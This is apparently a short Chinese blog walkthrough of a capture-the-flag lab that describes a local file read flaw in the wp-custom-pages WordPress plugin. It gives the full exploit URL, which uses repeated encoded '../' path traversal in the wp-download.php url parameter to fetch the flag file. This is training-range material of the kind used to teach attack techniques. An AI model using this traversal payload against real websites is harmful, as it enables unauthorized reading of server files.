)
1.阅读靶场介绍这里我们可以看到方式是存在本地文件读取漏洞大致就是对url做文章2.启动靶场接下来我们只需要访问这个urleci-2ze6u1viw32oybbqtq26.cloudeci1.ichunqiu.com:80//wp-content/plugins/wp-custom-pages/wp-download.php?url..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag访问后我们会下载一个文件打开就是我们的flag到此又要恭喜各位彦祖和亦非们攻克一个靶场了感谢你们宝贵的时间期待博主攻克任何靶场的话欢迎留言哟
)
)